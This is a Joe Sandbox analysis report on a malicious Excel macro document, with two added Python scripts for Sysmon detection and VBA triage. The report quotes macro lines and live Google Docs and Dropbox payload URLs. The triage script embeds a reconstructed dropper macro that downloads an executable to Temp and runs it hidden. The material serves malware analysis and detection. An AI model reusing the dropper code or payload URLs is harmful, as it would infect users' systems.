
Windows Analysis Report
universityform.xlsm

Overview

General Information

Sample name: universityform.xlsm
Analysis ID: 1582321
MD5: d04491647385cc373152651890cbc6e0
SHA1: b288e5e87ce113af41881431c7004904f6d6ba89
SHA256: 2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
Tags: xlsm, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7460 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 5348 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7392 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 172.217.18.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49737, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 172.217.18.14, SourceIsIpv6: false, SourcePort: 443
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7460, TargetFilename: C:\Users\user\Desktop\~$universityform.xlsm
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-30T11:11:04.207169+0100  2028371  3         Unknown Traffic  192.168.2.4  49737        172.217.18.14   443               TCP
2024-12-30T11:11:05.222205+0100  2028371  3         Unknown Traffic  192.168.2.4  49740        162.125.66.18   443               TCP
2024-12-30T11:11:06.275152+0100  2028371  3         Unknown Traffic  192.168.2.4  49742        162.125.66.18   443               TCP
2024-12-30T11:12:13.685090+0100  2028371  3         Unknown Traffic  192.168.2.4  49853        172.217.18.14   443               TCP
2024-12-30T11:12:14.696048+0100  2028371  3         Unknown Traffic  192.168.2.4  49862        162.125.66.18   443               TCP
2024-12-30T11:12:15.785998+0100  2028371  3         Unknown Traffic  192.168.2.4  49869        162.125.66.18   443               TCP
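The Sigma matches above are Sysmon records: EventID 3 (network connection) and EventID 11 (file create) with EXCEL.EXE as the Image. The script below is an added example, not part of the Joe Sandbox report and not the Sigma rules' own code; it reimplements that logic over constructed Sysmon-style records modelled on the fields shown above and adds two checks a practitioner would want next to the raw rule: a stricter variant that fires only when the destination is a public address (note that the second Sigma record lists the same flow with its endpoints swapped and Initiated still true, so a destination-based rule does not fire on it), and a file-create rule for executables written by an Office process. The ~$cache1.exe write and the firefox.exe control record are assumptions built from the macro's TMP string; the report does not show that file being created.

```python
"""Sysmon-based detection for what the Sigma section reports: an Office
process initiating network connections (EventID 3) and creating files
(EventID 11).

Added example; not the Sigma rules' code and not part of the Joe Sandbox
report. SAMPLE_EVENTS are CONSTRUCTED from the fields shown in the report;
the ~$cache1.exe write and the firefox.exe control record are assumptions.
"""
import ipaddress

EXCEL = r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"
OFFICE_IMAGES = ("\\excel.exe", "\\winword.exe", "\\powerpnt.exe",
                 "\\outlook.exe", "\\msaccess.exe", "\\mspub.exe", "\\visio.exe")
# Extensions an Office process has no business writing on a workstation.
DROP_EXTENSIONS = (".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".ps1", ".vbs", ".vbe", ".js", ".jse", ".hta", ".wsf")

SAMPLE_EVENTS = [
    # Sysmon EventID 3 as summarised by the first Sigma match in the report.
    {"EventID": 3, "Image": EXCEL, "ProcessId": 7460, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.4", "SourcePort": 49737,
     "DestinationIp": "172.217.18.14", "DestinationPort": 443},
    # The same flow as the second Sigma match shows it: endpoints swapped, Initiated still true.
    {"EventID": 3, "Image": EXCEL, "ProcessId": 7460, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "172.217.18.14", "SourcePort": 443,
     "DestinationIp": "192.168.2.4", "DestinationPort": 49737},
    # EventID 11 from the third Sigma match: Excel's owner lock file for the open workbook (benign).
    {"EventID": 11, "Image": EXCEL, "ProcessId": 7460,
     "TargetFilename": r"C:\Users\user\Desktop\~$universityform.xlsm"},
    # CONSTRUCTED: the write the macro's TMP string points at; not observed in the report.
    {"EventID": 11, "Image": EXCEL, "ProcessId": 7392,
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\~$cache1.exe"},
    # CONSTRUCTED control: a browser making the same connection must not fire.
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "ProcessId": 4242,
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.4", "SourcePort": 50001,
     "DestinationIp": "172.217.18.14", "DestinationPort": 443},
]


def is_office(image):
    """True when the Sysmon Image is one of the Office host executables."""
    return image.lower().endswith(OFFICE_IMAGES)


def is_public(ip):
    """True for globally routable addresses; RFC 1918, loopback, link-local etc. are excluded."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved)


def evaluate(event):
    """Return the names of the rules this one Sysmon record triggers."""
    hits = []
    if not is_office(event.get("Image", "")):
        return hits
    if event.get("EventID") == 3 and event.get("Initiated"):
        # Broad rule, like the report's "Excel Network Connections": any connection Excel initiates.
        hits.append("office_network_connection")
        # Stricter rule: only destinations outside the local ranges count as outbound.
        if is_public(event["DestinationIp"]):
            hits.append("office_outbound_public")
    elif event.get("EventID") == 11:
        # File-create rule: Office writing something executable, wherever it lands.
        if event.get("TargetFilename", "").lower().endswith(DROP_EXTENSIONS):
            hits.append("office_drops_executable")
    return hits


def run_detection(events):
    """(ProcessId, rule) pairs for every record that triggers a rule."""
    return [(e.get("ProcessId"), rule) for e in events for rule in evaluate(e)]


if __name__ == "__main__":
    for pid, rule in run_detection(SAMPLE_EVENTS):
        print(f"PID {pid}: {rule}")
```

On the constructed records the broad rule fires twice for PID 7460 (once per direction of the same flow), the public-destination rule once, and the drop rule once for the ~$cache1.exe write; the lock file and the browser connection produce nothing.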


AV Detection

Source: universityform.xlsm | Avira: detected
Source: universityform.xlsm | Virustotal: Detection: 66%
Source: universityform.xlsm | ReversingLabs: Detection: 68%
Source: universityform.xlsm | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: global traffic | DNS query: name: docs.google.com
Source: global traffic | DNS query: name: www.dropbox.com
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 172.217.18.14:443
Source: global traffic | TCP traffic: 192.168.2.4:49740 -> 162.125.66.18:443
Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 162.125.66.18:443
Source: global traffic | TCP traffic: 192.168.2.4:49853 -> 172.217.18.14:443
Source: global traffic | TCP traffic: 192.168.2.4:49862 -> 162.125.66.18:443
Source: global traffic | TCP traffic: 192.168.2.4:49869 -> 162.125.66.18:443
Source: global traffic | TCP traffic: 172.217.18.14:443 -> 192.168.2.4:49737
Source: global traffic | TCP traffic: 162.125.66.18:443 -> 192.168.2.4:49740
Source: global traffic | TCP traffic: 162.125.66.18:443 -> 192.168.2.4:49742
Source: global traffic | TCP traffic: 172.217.18.14:443 -> 192.168.2.4:49853
Source: global traffic | TCP traffic: 162.125.66.18:443 -> 192.168.2.4:49862
Source: global traffic | TCP traffic: 162.125.66.18:443 -> 192.168.2.4:49869
Source: excel.exe | Memory has grown: Private usage: 2MB later: 77MB
Source: Joe Sandbox View | IP Address: 162.125.66.18
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.217.18.14:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 162.125.66.18:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 162.125.66.18:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49853 -> 172.217.18.14:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49869 -> 162.125.66.18:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49862 -> 162.125.66.18:443
Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) | Host: docs.google.com
Source: global traffic | HTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) | Host: www.dropbox.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: docs.google.com
Source: global traffic | DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=utf-8
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:11:04 GMT
  Strict-Transport-Security: max-age=31536000
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Content-Security-Policy: script-src 'nonce-q0GAPQFIaaKGQ1rqp0jCGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Cross-Origin-Opener-Policy: same-origin
  Server: ESF
  X-XSS-Protection: 0
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Accept-Ranges: none
  Vary: Accept-Encoding
  Connection: close
  Transfer-Encoding: chunked
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=utf-8
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:12:13 GMT
  Strict-Transport-Security: max-age=31536000
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Content-Security-Policy: script-src 'nonce-nlYMqffGjvrncYmiM7UWdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Cross-Origin-Opener-Policy: same-origin
  Server: ESF
  X-XSS-Protection: 0
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Accept-Ranges: none
  Vary: Accept-Encoding
  Connection: close
  Transfer-Encoding: chunked
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: vbaProject.bin | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: vbaProject.bin | String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443

System Summary

Source: universityform.xlsm | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: universityform.xlsm | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")   (reported three times)
Source: universityform.xlsm | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: universityform.xlsm | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: universityform.xlsm | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsm | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: universityform.xlsm | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsm | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: universityform.xlsm | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: universityform.xlsm | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: universityform.xlsm | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: universityform.xlsm | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32
Source: universityform.xlsm | OLE, VBA macro line: Private Sub Workbook_Open()
Source: universityform.xlsm | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: universityform.xlsm | OLE indicator, VBA macros: true
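The macro lines quoted above describe a two-branch loader: run an existing %ALLUSERSPROFILE%\Synaptics\Synaptics.exe (or the copy under System32\Synaptics) with a hidden window, otherwise fetch a payload with WinHttp.WinHttpRequest and write it to %Temp%\~$cache1.exe, with ADODB.Stream as the likely byte-to-disk path. Because the report also flags VBA stomping (only p-code present), the stored source text is not necessarily what Excel executes, so a triage of the source is a lower bound on the macro's behaviour, not a full account. The script below is an added example, not code from Joe Sandbox and not the sample's real macro: it assembles the quoted lines into a plausible macro body (a constructed reconstruction whose control flow, status check and ADODB.Stream statements are assumptions; the report infers ADODB.Stream only from function names) and runs a keyword triage over it that extracts auto-exec entry points, COM objects, URLs, Environ()-derived drop paths and hidden Shell calls, then scores them.

```python
"""Keyword triage of an Office VBA macro body.

Added example, not Joe Sandbox code and not the sample's real macro.
SAMPLE_VBA is CONSTRUCTED from the individual lines the report quotes from
universityform.xlsm; its control flow, the Status check and the ADODB.Stream
statements are assumptions.
"""
import json
import re

SAMPLE_VBA = r'''
Private Sub Workbook_Open()
    Dim FSO, myWS, WinHttpReq, Stream, FN, TMP
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set myWS = CreateObject("WScript.Shell")
    FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
    TMP = Environ("Temp") & "\~$cache1.exe"
    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
        Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
    ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
        Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
    Else
        On Error Resume Next
        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
        If WinHttpReq Is Nothing Then Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
        On Error GoTo 0
        WinHttpReq.Open "GET", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", False
        WinHttpReq.Send
        If WinHttpReq.Status = 200 Then
            Set Stream = CreateObject("ADODB.Stream")
            Stream.Open
            Stream.Type = 1
            Stream.Write WinHttpReq.ResponseBody
            Stream.SaveToFile TMP, 2
            Stream.Close
            Shell TMP, vbHide
        End If
    End If
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
    ' second auto-exec entry point quoted in the report; its body is not on the page
End Sub
'''

# Procedures Office runs without a click: Workbook_Open, Document_Open, AutoOpen, ...
AUTOEXEC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+((?:Workbook|Document|Auto)_?\w+)\s*\(",
                         re.I | re.M)
CREATEOBJECT_RE = re.compile(r'CreateObject\(\s*"([^"]+)"\s*\)', re.I)
URL_RE = re.compile(r"""https?://[^\s"']+""", re.I)
# Environ("VAR") & "\tail"  ->  %VAR%\tail
ENVPATH_RE = re.compile(r'Environ\(\s*"(\w+)"\s*\)\s*&\s*"([^"]+)"', re.I)
# Shell <command>[, vbHide|vbNormalFocus|...]
SHELL_RE = re.compile(r"^\s*Shell\s+(.+?)(?:,\s*(vb\w+))?\s*$", re.I | re.M)

SUSPICIOUS_COM = {
    "wscript.shell": "WSH: process start, registry, environment",
    "winhttp.winhttprequest.5.1": "HTTP download",
    "winhttp.winhttprequest.5": "HTTP download",
    "msxml2.xmlhttp": "HTTP download",
    "msxml2.serverxmlhttp": "HTTP download",
    "adodb.stream": "binary file write (dropper)",
    "scripting.filesystemobject": "file system access",
}
DOWNLOADERS = ("winhttp.", "msxml2.")


def triage_vba(src):
    """Return the indicators found in VBA source text plus a coarse 0-6 score."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)})
    com = sorted({m.group(1).lower() for m in CREATEOBJECT_RE.finditer(src)})
    urls = sorted(set(URL_RE.findall(src)))
    drop_paths = sorted({f"%{var}%{tail}" for var, tail in ENVPATH_RE.findall(src)})
    shells = [(cmd.strip(), flag) for cmd, flag in SHELL_RE.findall(src)]
    hidden = any(flag.lower() == "vbhide" for _, flag in shells)

    score = 0
    score += int(bool(autoexec))                                    # runs without user action
    score += int(any(c.startswith(DOWNLOADERS) for c in com))       # fetches a second stage
    score += int("wscript.shell" in com)                            # WSH shell access
    score += int("adodb.stream" in com)                             # writes raw bytes to disk
    score += int(bool(shells))                                      # launches a program
    score += int(any(p.lower().endswith(".exe") for p in drop_paths))  # executable in an Environ() path
    return {
        "autoexec": autoexec,
        "com_objects": com,
        "com_notes": {c: SUSPICIOUS_COM[c] for c in com if c in SUSPICIOUS_COM},
        "urls": urls,
        "drop_paths": drop_paths,
        "shell_calls": shells,
        "hidden_exec": hidden,
        "score": score,
    }


if __name__ == "__main__":
    print(json.dumps(triage_vba(SAMPLE_VBA), indent=2))
```

On the reconstructed body the triage reports both Workbook_ entry points, five COM objects, the docs.google.com URL, the three Environ()-based paths and three hidden Shell calls, for the maximum score of 6; a macro that only shows a message box scores 0. Run it against source recovered with an OLE/VBA extractor, and treat an empty or trivial result on a stomped document as "source unavailable" rather than "clean".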
Source: ~DF0ED33014A7655102.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF28C3246DA78E1C43.TMP.7.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine | Classification label: mal84.expl.evad.winXLSM@4/7@3/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$universityform.xlsm
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{D228075B-5AA4-46F0-8F8D-93B8534120F7} - OProcSessId.dat
Source: universityform.xlsm | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: universityform.xlsm | Virustotal: Detection: 66%
Source: universityform.xlsm | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp2.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp9.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp3.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp4.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp5.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp6.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp7.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp8.xml
Source: universityform.xlsm | Initial sample: OLE zip file path = xl/ctrlProps/ctrlProp1.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: ~DF0ED33014A7655102.TMP.0.dr | Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (74 identical entries)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\splwow64.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (13 identical entries)
Source: C:\Windows\splwow64.exe | Window / User API: threadDelayed 1107
Source: C:\Windows\splwow64.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000 (2 identical entries)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: universityform.xlsm | OLE indicator, VBA stomping: true
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 42 Scripting | Valid Accounts | 3 Exploitation for Client Execution | 42 Scripting | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Obfuscated Files or Information | 1 Extra Window Memory Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Source | Detection | Scanner | Label
universityform.xlsm | 66% | Virustotal |
universityform.xlsm | 68% | ReversingLabs | Document-Word.Trojan.Orcinius
universityform.xlsm | 100% | Avira | W2000M/Dldr.Agent.17651006
universityform.xlsm | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
